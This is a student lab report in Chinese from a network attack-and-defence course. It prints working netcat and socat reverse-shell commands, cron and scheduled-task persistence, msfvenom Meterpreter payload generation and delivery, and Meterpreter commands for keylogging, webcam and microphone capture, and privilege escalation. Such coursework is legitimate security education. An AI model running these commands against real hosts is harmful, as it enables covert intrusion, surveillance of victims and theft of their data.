首页 > 其他分享 >20222405 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222405 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-18 09:46:51浏览次数:1  
标签:命令 kali 2024 2025 2405 20222405 主机 输入

1.实验内容

1.1 实践目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2 问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

攻击者通过在网站上放置看似合法的恶意软件,用户下载并运行后,后门程序便会在系统中安装。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

Windows:通过安装一个恶意服务,利用services.msc来启动后门。

Linux:攻击者可以创建或修改系统的crontab任务,使后门程序定时运行。

(3)Meterpreter有哪些给你映像深刻的功能?

可以远程开启目标系统的摄像头或进行屏幕截取,获取敏感信息。

(4)如何发现自己有系统有没有被安装后门?

可以使用网络流量监控工具(如Wireshark)查看是否有未知的外部连接或异常端口打开。

2.实验过程

2.1 任务一 使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

ipconfig查看一下主机的ip地址

然后使用netcat进行连接:

在kali输入命令:nc 192.168.43.214 2405 -e /bin/sh

在主机输入命令:nc.exe -l -p 2405

在主机命令行中输入ls,能正常显示文件名,证明主机已成功获取shell

启动kali的root用户,输入crontab -e,选择第二个/usr/bin/vim.basic

输入后进入文字编辑器,新增命令5 * * * * /bin/netcat 192.168.43.214 2405 -e /bin/sh****

这条命令是在每小时的第5分钟启动任务

输入命令crontab -l查看任务

可以在/var/spool/cron/crontabs中找到root文件

然后在主机的中操作,输入:echo "* * * * * echo "chuzhehao" > /home/kali/20222405.txt" > /var/spool/cron/crontabs/root

每分钟执行一次用“chuzhehao”覆盖文件20222405.txt,再输入crontab -l检查时程表

查看修改之前的文件20222405.txt,内容是20222405

在kali中检查20222405.txt文件,内容成功修改为chuzhehao

2.2 任务二 使用socat获取主机操作Shell,任务计划启动

在主机中输入命令:socat.exe tcp-listen:2405 exec:cmd.exe,pty,stderr

在kali中输入命令:socat - tcp:192.168.43.214:2405

先编写一个程序

在kali中输入命令:schtasks /create /sc minute /mo 1 /tn "20222221chuzhehao" /tr C:\20222405\20222405.exe

每一分钟执行一次程序

回到主机查看正在运行的任务“20222405chuzhehao”,实验成功。

2.3 任务三 在Linux下使用MSF meterpreter生成可执行文件,利用ncat或socat传送到Windows主机并运行获取主机shell

先关闭防火墙

在kali中输入ifconfig获得ip地址172.20.10.9

继续输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.245 LPORT=2405 -f exe > 20222405backdoor.exe

主机输入命令:nc 172.20.10.9 12345 >C:\socat\20222405backdoor.exe

kali输入命令nc -lvp 12345</tmp/20222405backdoor.exe

这样就将后门程序传到主机了

在Kali中输入命令msfconsole,然后配置监听模块

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 172.20.10.9

set LPORT 2405

接着输入exploit,运行监听模块,并在主机运行20222405backdoor.exe文件

在kali中输入ls查看主机目录

2.4 任务四 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

接着任务三继续输入命令

record_mic 音频

screenshot 截屏

webcam_snap 拍照

keyscan_start 开始读取键盘记录

keyscan_dump 结束读取键盘记录

接下来尝试提权

继续输入

getuid 查看当前用户

getsystem 提权指令

2.5 任务五 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

在kali中输入命令msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.9 LPORT=2405 -x /home/kali/pwn1 -f elf > pwn2405

接下来赋予pwn2405权限

接下来重现监听过程

输入命令

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set LHOST 172.20.10.9

set LPORT 2405

exploit

打开另一个终端输入命令./pwn2405运行pwn2405

回到刚才的终端,输入ls确认连接,成功实现远程控制shell

3.问题及解决方案

问题1:后门程序无法传入主机

问题1解决方案:

kali输入命令:nc -lvp 12345</tmp/20222405backdoor.exe

主机输入命令:nc 172.20.10.9 12345 >C:\socat\20222405backdoor.exe

问题2:Kali中msf拿shell后中文乱码

问题2解决方案:输入chcp 65501即可

4.学习感悟、思考等

实验二的任务很多,顺着坐下来其实还算并比较顺利,但比较困扰我的是我在任务三卡了很长时间,试了很多种方法都没办法传输后门程序,于是只好换个思路试一下,好在最后成功了,但之前连接不上的原因我不是很清楚,也没有找到解决方法,这就比较玄学了,甚至有的时候遇到问题重启虚拟机问题就解决了,这个插曲困扰了我很长时间

通过这次实验我收获了很多,我学会了netcat、socat、msf等工具的用法,最让我印象深刻的是通过工具居然可以操控别人的摄像头,还能拍照,感觉非常的高级,同时也让我感觉到网络攻击其实离我们并没有那么遥远,所以我们要提高警惕,加强防范,避免隐私信息泄露。

标签:命令,kali,2024,2025,2405,20222405,主机,输入
From: https://www.cnblogs.com/20222405chu/p/18472635

相关文章

  • 【2024-10-17】缺在大人
    20:00依我看,最美好的人生是向合情合理的普通样板看齐的人生,这样的人生有序,但无奇迹,也不荒唐。                                                 ——蒙田大宝最近一周......
  • 【实战为王】CSDN 2025年500个顶尖实战项目,打造技术精英!
     一、引言......
  • GitLab CVE-2024-6678、CVE-2024-8640 漏洞解决方案
    极狐GitLab近日发布安全补丁版本17.3.2,17.2.5,17.1.7,修复了17个安全漏洞,本分分享CVE-2024-6678、CVE-2024-8640两个漏洞详情。极狐GitLab正式推出面向GitLab老旧版本免费用户的专业升级服务,为GitLab老旧版本进行专业升级,详情可以查看官网GitLab专业升级服务指......
  • Burp Suite Professional 2024.9 for macOS x64 & ARM64 - 领先的 Web 渗透测试软件
    BurpSuiteProfessional2024.9formacOSx64&ARM64-领先的Web渗透测试软件世界排名第一的Web渗透测试工具包请访问原文链接:https://sysin.org/blog/burp-suite-pro-mac/查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgBurpSuiteProfessionalTheworld......
  • 2024年全面的多端统一开发解决方案推荐!
    前言最近在DotNetGuide技术社区交流群看到有不少小伙伴问:有没有一套代码能够同时在多个平台运行的框架推荐?今天大姚给大家分享8个多端统一开发框架其中语言包括C#、C++、Vue、React、Dart、Kotlin等等(一套代码,可以运行到多个平台从而大幅减轻开发者的开发与维护负担),同学们可以按......
  • 【题解】Solution Set - NOIP2024集训Day56 哈希杂题
    【题解】SolutionSet-NOIP2024集训Day56哈希杂题https://www.becoder.com.cn/contest/5640「CF568C」NewLanguage做过的2-sat。「NOI2024」集合做过。做法见提交记录。「CSP-S2022」星战简要题意:给定有向图。修改使一条边失效/恢复;使一个点的所有入边......
  • 2024 CSP-J/S2 模板复习计划
    2024CSP-J/S2模板复习计划(Starton2024-10-18)说明原来这个计划是2023CSP-J/S2模板复习,现在被拿来当模板集。Day1我的记录@zhenghanyun的记录任务已完成SPFA(不带负环)已完成Floyd已完成Dijkstra已完成拓扑排序已完成单调栈已......
  • k8s-Longhorn系统配置 20241017 -分布式存储
    目录一Longhorn存储部署1.1Longhorn概述1.2Longhorn部署1.5动态sc创建1.6测试PV及PVC1.7Ingress暴露Longhorn1.8确认验证附加Helm部署附0.1helm安装附0.2helm安装 回到顶部一Longhorn存储部署1.1Longhorn概述Longhorn是用于Kubernetes的......
  • 2024 年江西省职业院校技能大赛应用软件系统开发赛项竞赛方案(高职组)
    2024 年江西省职业院校技能大赛应用软件系统开发赛项竞赛方案(高职组)各高职院校(含职教本科):根据2024年全省职业院校技能大赛工作安排,决定举办2024年江西省职业院校技能大赛应用软件系统开发赛项竞赛, 为了确保竞赛工作顺利开展,特制定本竞赛方案。一、赛项介绍赛项简......
  • 2025计算机专业基于微信小程序的毕业设计选题参考【题目新颖】
    对于计算机专业基于微信小程序的毕业设计选题,追求新颖性是关键。以下是一些建议的选题,它们结合了当前的技术趋势和社会需求,旨在提供具有创新性和实用性的项目方向:1.基于微信小程序的智能健康管理系统 结合物联网设备,如智能手环、体重秤等,收集用户的健康数据。 通过小程......